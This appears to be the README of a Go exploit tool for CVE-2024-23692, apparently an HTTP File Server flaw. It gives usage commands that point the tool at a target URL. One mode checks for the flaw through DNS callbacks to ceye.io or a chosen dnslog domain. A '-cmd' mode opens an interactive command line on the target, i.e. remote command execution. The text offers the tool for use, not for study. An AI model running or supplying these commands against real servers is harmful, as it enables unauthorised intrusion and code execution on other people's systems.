CVE-2024-23692
Usage: go run hfs.go -h


go run hfs.go -u http://127.0.0.1 -dns // default uses ceye.io (requires configuration)
go run hfs.go -u http://127.0.0.1 -dns -d abc.cn // specify dnslog

go run hfs.go -u http://127.0.0.1 -cmd // enter command line

Tips: DNSLOG detection defaults to using ceye.io. To use it, configure the config.ini file in the config directory
Not packaged as exe, you can package it yourself